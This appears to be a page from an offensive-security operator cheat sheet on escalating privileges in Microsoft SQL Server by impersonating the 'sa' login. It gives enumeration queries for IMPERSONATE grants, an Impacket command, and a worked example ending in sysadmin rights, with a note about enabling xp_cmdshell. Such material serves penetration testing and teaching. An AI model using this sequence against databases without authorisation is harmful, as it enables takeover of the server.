Operator On The Wire

Impersonation (MSSQL)

Enumerate

-- Lists logins for which an IMPERSONATE grant exists. In practice the grantor SQL Server records for an
-- IMPERSONATE permission on a login is that login itself, so joining on grantor_principal_id returns the
-- impersonable logins. It does not filter by grantee, so a hit means "someone" can impersonate it, not necessarily us.
SELECT DISTINCT name FROM sys.server_permissions JOIN sys.server_principals ON grantor_principal_id = principal_id WHERE permission_name = 'IMPERSONATE';

-- Also, from an Impacket mssqlclient.py shell:

enum_impersonate

Execute

EXECUTE AS LOGIN = 'sa';

Cleanup

After EXECUTE AS LOGIN = 'sa', every following T-SQL statement in the session runs in sa's security context until we issue REVERT. Contexts nest: each EXECUTE AS needs its own REVERT, and ORIGINAL_LOGIN() still reports the login we actually connected with. Drop back to our own context like so:

REVERT;
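The full round trip, as an added worked example that is not part of the original page: confirm the starting context, enumerate impersonation grants that apply to the current login (filtering on major_id and grantee rather than only on the grantor), switch to sa, verify the switch, and revert. It assumes a low-privileged login that has been granted IMPERSONATE on sa; no login names other than sa are hard-coded.

```sql
-- Added example (not from the original page). Run as one batch in sqlcmd, SSMS, or mssqlclient.py.
-- Assumption: the current login (or a server role it belongs to) has IMPERSONATE on the 'sa' login.

-- 1. Starting context: our own login, not sysadmin.
SELECT SYSTEM_USER AS current_login,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;      -- expected 0 before impersonation

-- 2. Which logins can *we* impersonate?
--    For IMPERSONATE on a login, class_desc is SERVER_PRINCIPAL, major_id is the target login
--    and grantee_principal_id is the login or server role that holds the right.
SELECT target.name  AS can_impersonate,
       grantee.name AS granted_to,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
WHERE p.class_desc       = 'SERVER_PRINCIPAL'
  AND p.permission_name  = 'IMPERSONATE'
  AND p.state_desc IN ('GRANT', 'GRANT_WITH_GRANT_OPTION')
  AND (grantee.name = SYSTEM_USER                        -- granted to us directly
       OR IS_SRVROLEMEMBER(grantee.name) = 1);           -- or to a server role we are in

-- 3. Switch login context. This raises an error if the grant above is missing.
EXECUTE AS LOGIN = 'sa';

-- 4. Prove it: SYSTEM_USER is now 'sa', ORIGINAL_LOGIN() is still our real login.
SELECT SYSTEM_USER        AS current_login,               -- 'sa'
       ORIGINAL_LOGIN()   AS original_login,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;       -- expected 1 while impersonating

-- ... privileged work goes here (e.g. enabling xp_cmdshell via sp_configure) ...

-- 5. One REVERT per EXECUTE AS, because contexts nest.
REVERT;
SELECT SYSTEM_USER AS current_login;                       -- back to the original login
```

Filtering on the grantee matters on shared servers: the bare grantor join from the enumeration section lists every login anyone can impersonate, while the query above only returns the ones the current session can actually use, which is what you want before spending an EXECUTE AS attempt that will be logged on failure.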